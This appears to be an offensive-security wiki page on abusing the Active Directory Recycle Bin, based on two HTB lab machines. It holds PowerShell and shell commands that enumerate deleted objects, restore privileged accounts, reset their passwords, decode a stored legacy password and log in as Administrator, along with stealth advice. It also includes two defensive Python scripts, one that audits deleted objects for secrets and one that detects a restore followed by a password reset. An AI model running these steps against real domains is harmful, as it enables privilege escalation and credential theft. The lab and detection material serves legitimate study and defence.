# AD Recycle Bin Attacks

## Overview

The Active Directory Recycle Bin, introduced in Windows Server 2008 R2, preserves deleted AD objects with their attributes intact so that they can be recovered. An attacker who controls a user with read access to deleted objects (or control over the OU the objects were deleted from) can enumerate deleted user accounts, service accounts and groups. Deleted objects often still carry hardcoded passwords in custom attributes, group memberships that reveal privilege chains, and metadata that helps map the domain structure. In some cases (as in Cascade on HTB), a deleted administrative account with a recoverable password is a direct path to Domain Admin.
## Prerequisites

- A domain user account with read permissions on deleted objects (Authenticated Users by default)
- For recovery: permissions on the target's lastKnownParent OU, or membership in a group with OU-level control
- Windows PowerShell with the ActiveDirectory module, or an on-host shell
## Detection & Enumeration

### Verify Recycle Bin is Enabled

```powershell
# Check whether the AD Recycle Bin optional feature is active
Get-ADOptionalFeature 'Recycle Bin Feature'
# Look for: EnabledScopes populated, Name = "Recycle Bin Feature"

# Alternative: read the feature object directly over LDAP
# CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,
# CN=Services,CN=Configuration,DC=<domain>,DC=<tld>
```
### Enumerate Deleted Objects

```powershell
# List all deleted objects (excluding the Deleted Objects container itself)
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' `
    -IncludeDeletedObjects

# List only deleted user accounts
# (objectClass=user also matches computer objects; add (objectCategory=person) to exclude them)
Get-ADObject -LDAPFilter "(&(objectclass=user)(isDeleted=TRUE))" `
    -IncludeDeletedObjects

# Include useful properties: objectSid and lastKnownParent
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' `
    -IncludeDeletedObjects -Properties objectSid, lastKnownParent

# Filter for a specific display name
Get-ADObject -LDAPFilter "(&(objectclass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" `
    -IncludeDeletedObjects -Properties *

# The lastKnownParent attribute shows which OU the object was deleted from.
# This is critical for determining whether you have recovery rights.
```
### Key Attributes in Deleted Objects

```powershell
# Dump all properties of a specific deleted object.
# Important attributes to examine:
# - userPrincipalName (UPN)
# - sAMAccountName (username)
# - description, info, comment (may contain passwords)
# - memberOf (group memberships; reveals privilege paths)
# - servicePrincipalName (SPNs)
# - lastKnownParent (OU origin for recovery)
# - custom application attributes (e.g., cascadeLegacyPwd, userPassword)
# - objectSid (the SID, including RID)
# - whenChanged, whenCreated (timestamps)
Get-ADObject -Identity "<objectGUID>" -IncludeDeletedObjects -Properties *
```
## Exploitation / Execution

### Restoring Deleted Privileged Objects

```powershell
# Restore a deleted object by its ObjectGUID
# Requires permissions on the lastKnownParent OU
Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"

# Verify the object is restored
Get-ADUser -Identity <samAccountName>

# From TombWatcher HTB:
# 1. Enumerate deleted objects
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' `
    -IncludeDeletedObjects -Properties objectSid, lastKnownParent
# Found cert_admin (deleted from OU=ADCS)

# 2. Restore the specific instance with RID 1111
Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"
# Success: cert_admin restored to OU=ADCS

# 3. Reset the password on the restored account (requires OU-level permissions)
# -Reset is required for an administrative reset; without it the cmdlet
# performs a change-password operation and prompts for the old password
Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword `
    (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
```
### Password Recovery from Deleted Attributes

```powershell
# From Cascade HTB:
# 1. Enumerate deleted users
Get-ADObject -LDAPFilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects

# 2. Find TempAdmin by its DisplayName
Get-ADObject -LDAPFilter "(&(objectclass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" `
    -IncludeDeletedObjects -Properties *
# Found: cascadeLegacyPwd attribute with a Base64-encoded password

# 3. Decode the password (Base64) -- run from the attacker's Linux shell
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
# Output: baCT3r1aN00dles

# 4. Try the password on Administrator (password reuse) -- Linux shell
evil-winrm -i <DC> -u Administrator -p 'baCT3r1aN00dles'
# Success: TempAdmin had the same password as Administrator
```
### Gaining Recovery Permissions

If you have GenericAll on the OU an object was deleted from, you can restore the object and then reset its password (as demonstrated in TombWatcher with John -> ADCS OU -> cert_admin). The BloodHound path looks like this:

1. A user has GenericAll on a specific OU
2. That OU is the lastKnownParent of a deleted privileged account
3. Restore-ADObject followed by Set-ADAccountPassword gives immediate access
### Automated Discovery

```powershell
# Script to find all deleted users with interesting attributes
$deletedUsers = Get-ADObject -LDAPFilter "(&(objectclass=user)(isDeleted=TRUE))" `
    -IncludeDeletedObjects -Properties *

foreach ($user in $deletedUsers) {
    Write-Host "User: $($user.Name)"
    Write-Host "  SID: $($user.objectSid)"
    Write-Host "  LastKnownParent: $($user.lastKnownParent)"
    Write-Host "  sAMAccountName: $($user.sAMAccountName)"

    # Look for password-like attributes (wildcards match any attribute name
    # containing password/legacy/pwd, e.g. cascadeLegacyPwd)
    $props = $user | Select-Object description, info, comment, userPassword, *password*, *legacy*, *pwd*
    foreach ($prop in $props.PSObject.Properties) {
        if ($prop.Value) {
            Write-Host "  $($prop.Name): $($prop.Value)" -ForegroundColor Yellow
        }
    }
    Write-Host ""
}
```
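Added example (not part of the original page): a defender-side audit of an exported set of deleted objects, so that secrets parked in the Recycle Bin can be found and purged before anyone else finds them. It applies the same heuristics as the discovery script above (credential-named attributes, free-text fields that mention a password) and additionally tests whether a flagged value is Base64 that decodes to printable text, which is how cascadeLegacyPwd was stored. It is written in Python so it can run anywhere over a JSON export such as `Get-ADObject ... -Properties * | ConvertTo-Json`; the sample objects are constructed for this example, the `example.local` domain is a placeholder, and the attribute names other than cascadeLegacyPwd, userPassword, description, info and comment are assumptions.

```python
import base64
import binascii
import re

# Attribute names that suggest a stored credential (case-insensitive)
CREDENTIAL_NAME = re.compile(r"password|passwd|pwd|legacy|secret|cred", re.IGNORECASE)
# Free-text fields that admins sometimes use to park a password
FREE_TEXT_FIELDS = {"description", "info", "comment"}
PASSWORD_HINT = re.compile(r"pass|pwd|cred", re.IGNORECASE)
# Built-in attributes whose names match the regex but hold timestamps/counters, not secrets
IGNORED_ATTRIBUTES = {"pwdlastset", "badpwdcount", "badpasswordtime",
                      "msds-userpasswordexpirytimecomputed"}
BASE64_SHAPE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def decode_if_base64(value):
    """Return the decoded text if value is Base64 that decodes to printable ASCII, else None."""
    if not BASE64_SHAPE.fullmatch(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)   # rejects bad padding / stray characters
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def audit_object(attributes):
    """Return (attribute, value, reason) findings for one deleted object's attribute dict."""
    findings = []
    for name, value in attributes.items():
        if not isinstance(value, str) or not value or name.lower() in IGNORED_ATTRIBUTES:
            continue
        if name.lower() in FREE_TEXT_FIELDS:
            if PASSWORD_HINT.search(value):
                findings.append((name, value, "free-text field mentions a credential"))
        elif CREDENTIAL_NAME.search(name):
            decoded = decode_if_base64(value)
            if decoded:
                findings.append((name, decoded, "Base64 value decodes to printable text"))
            else:
                findings.append((name, value, "credential-named attribute holds a value"))
    return findings


def audit_deleted_objects(objects):
    """Map sAMAccountName -> findings for every object that has at least one finding."""
    report = {}
    for obj in objects:
        findings = audit_object(obj)
        if findings:
            report[obj.get("sAMAccountName", obj.get("Name", "?"))] = findings
    return report


# Constructed sample export (shape of Get-ADObject -IncludeDeletedObjects -Properties * | ConvertTo-Json)
SAMPLE_DELETED_OBJECTS = [
    {"sAMAccountName": "TempAdmin", "DisplayName": "TempAdmin",
     "description": "Temporary admin account", "pwdLastSet": "132246123456789012",
     "cascadeLegacyPwd": "YmFDVDNyMWFOMDBkbGVz",   # value from the page; decodes to baCT3r1aN00dles
     "lastKnownParent": "OU=Users,DC=example,DC=local"},
    {"sAMAccountName": "svc_backup", "description": "Backup service. Password rotated 2019-06",
     "userPassword": "", "lastKnownParent": "OU=Service Accounts,DC=example,DC=local"},
    {"sAMAccountName": "old_printer", "description": "Decommissioned print queue",
     "lastKnownParent": "OU=Printers,DC=example,DC=local"},
]

if __name__ == "__main__":
    for account, findings in audit_deleted_objects(SAMPLE_DELETED_OBJECTS).items():
        for attribute, value, reason in findings:
            print(f"{account}: {attribute} = {value!r} ({reason})")
```

The Base64 test is deliberately strict (`validate=True`, printable ASCII only) so that ordinary words and timestamps are not reported as decoded secrets; a plain password such as baCT3r1aN00dles is reported as-is under the credential-named-attribute rule instead.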
## Common Pitfalls

- Recycle Bin not enabled: the feature must be activated manually. If it is not enabled, deleted objects are tombstoned (most attributes stripped) and cannot be recovered.
- Multiple instances of the same name: objects that were deleted and re-created several times have several deleted instances. Identify the correct one by objectSid (RID).
- Restore-ADObject permissions: you need write access on the lastKnownParent container, which is why GenericAll on the OU works.
- Deleted objects with adminCount=1: protected objects (such as former Domain Admins) retain adminCount=1, so permission inheritance may be restricted.
- Attribute differences: not every attribute is preserved in the Recycle Bin (linked attributes such as memberOf may not be preserved intact).
## OPSEC Considerations

- Enumerating deleted objects is a passive LDAP query; it generates only standard directory read events
- Restoring an object (Restore-ADObject) generates Event ID 5136 (directory service change), provided Directory Service Changes auditing is enabled and the object's SACL covers the change
- Password resets on restored accounts generate Event ID 4724
- The restored account appears as a new/restored object in the target OU — this may be noticed by administrators
- Consider restoring, using, and then re-deleting the object for stealth (but the events remain)
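Added example for the detection side of the events listed above; it is not from the original page. It takes normalised Security-log events (as a SIEM or a `Get-WinEvent` export would present them), treats a 5136 that removes the isDeleted value from an object as a Recycle Bin restore, and flags any 4724 password reset against the same account within a window, which is exactly the Restore-ADObject + Set-ADAccountPassword chain this page describes. Field names follow the 5136 and 4724 event schemas; the events themselves are constructed, the `example.local` domain and the old_printer GUID are placeholders, and the one-hour window is an assumption to tune per environment.

```python
from datetime import datetime, timedelta

# Event 5136 OperationType codes: %%14674 = Value Added, %%14675 = Value Deleted
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Constructed sample events (not real telemetry); field names follow the 5136 / 4724 schemas
SAMPLE_EVENTS = [
    # Restore of cert_admin: the isDeleted value is removed from the deleted-object DN
    {"EventID": 5136, "TimeCreated": "2024-05-01T10:00:03", "SubjectUserName": "john",
     "ObjectDN": "CN=cert_admin\\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,"
                 "CN=Deleted Objects,DC=example,DC=local",
     "AttributeLDAPDisplayName": "isDeleted", "OperationType": VALUE_DELETED},
    {"EventID": 5136, "TimeCreated": "2024-05-01T10:00:03", "SubjectUserName": "john",
     "ObjectDN": "CN=cert_admin,OU=ADCS,DC=example,DC=local",
     "AttributeLDAPDisplayName": "distinguishedName", "OperationType": VALUE_ADDED},
    # A restore with no follow-up reset (benign recovery of a printer object)
    {"EventID": 5136, "TimeCreated": "2024-05-01T09:12:00", "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=old_printer\\0ADEL:00000000-0000-0000-0000-000000000001,"
                 "CN=Deleted Objects,DC=example,DC=local",
     "AttributeLDAPDisplayName": "isDeleted", "OperationType": VALUE_DELETED},
    # Ordinary attribute change, not a restore
    {"EventID": 5136, "TimeCreated": "2024-05-01T09:30:00", "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=jdoe,OU=Users,DC=example,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    # Password reset of the freshly restored account, by the same principal
    {"EventID": 4724, "TimeCreated": "2024-05-01T10:04:40", "SubjectUserName": "john",
     "TargetUserName": "cert_admin", "TargetDomainName": "EXAMPLE"},
    # Routine helpdesk reset of a live account
    {"EventID": 4724, "TimeCreated": "2024-05-01T11:30:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "jdoe", "TargetDomainName": "EXAMPLE"},
]


def cn_from_dn(dn):
    """Extract the CN from a DN, stripping the \\0ADEL:<guid> suffix a deleted object carries."""
    rdn = dn.split(",", 1)[0]
    if rdn.upper().startswith("CN="):
        rdn = rdn[3:]
    return rdn.split("\\0ADEL:", 1)[0]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def find_restores(events):
    """A 5136 that removes isDeleted from an object is a Recycle Bin restore."""
    return [
        {"account": cn_from_dn(e["ObjectDN"]), "restored_by": e["SubjectUserName"],
         "restored_at": _ts(e)}
        for e in events
        if e["EventID"] == 5136
        and e.get("AttributeLDAPDisplayName", "").lower() == "isdeleted"
        and e.get("OperationType") == VALUE_DELETED
    ]


def find_restore_then_reset(events, window=timedelta(hours=1)):
    """Pair each restore with any 4724 reset of the same account inside the window."""
    hits = []
    for restore in find_restores(events):
        for e in events:
            if e["EventID"] != 4724:
                continue
            if e["TargetUserName"].lower() != restore["account"].lower():
                continue
            reset_at = _ts(e)
            if restore["restored_at"] <= reset_at <= restore["restored_at"] + window:
                hits.append({**restore, "reset_by": e["SubjectUserName"], "reset_at": reset_at})
    return hits


if __name__ == "__main__":
    for hit in find_restore_then_reset(SAMPLE_EVENTS):
        delay = hit["reset_at"] - hit["restored_at"]
        print(f"ALERT: {hit['account']} restored by {hit['restored_by']} at {hit['restored_at']}, "
              f"password reset by {hit['reset_by']} {delay} later")
```

Restores on their own (`find_restores`) are worth a lower-severity review, since legitimate recoveries happen; the restore-then-reset pairing is the high-signal case, and matching on the CN rather than the full DN keeps the correlation working whether the 5136 reports the deleted-object DN or the live one.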
## Post-Exploitation Value

- Recover credentials from deleted accounts (hardcoded passwords in custom attributes)
- Discover privilege chains through deleted group memberships
- Restore a deleted privileged account (e.g., former Domain Admin, ADCS admin)
- Map domain history and understand administrative structures
- Recover deleted service accounts that may hold Kerberos delegation rights
## Cross-References

### Tool References

| Tool | Link |
|---|---|
| Get-ADObject (PowerShell) | Built-in ActiveDirectory module |
| Restore-ADObject (PowerShell) | Built-in ActiveDirectory module |
| Get-ADOptionalFeature (PowerShell) | Built-in ActiveDirectory module |
| BloodHound | https://github.com/BloodHoundAD/BloodHound |

### Source Machines

- Cascade (Medium) — ArkSvc in AD Recycle Bin group -> recover deleted TempAdmin -> cascadeLegacyPwd (Base64) -> Admin password reuse -> Administrator login
- TombWatcher (Medium) — John has GenericAll over ADCS OU -> cert_admin deleted from ADCS OU -> Restore-ADObject -> Set-ADAccountPassword -> cert_admin -> ESC15 -> Administrator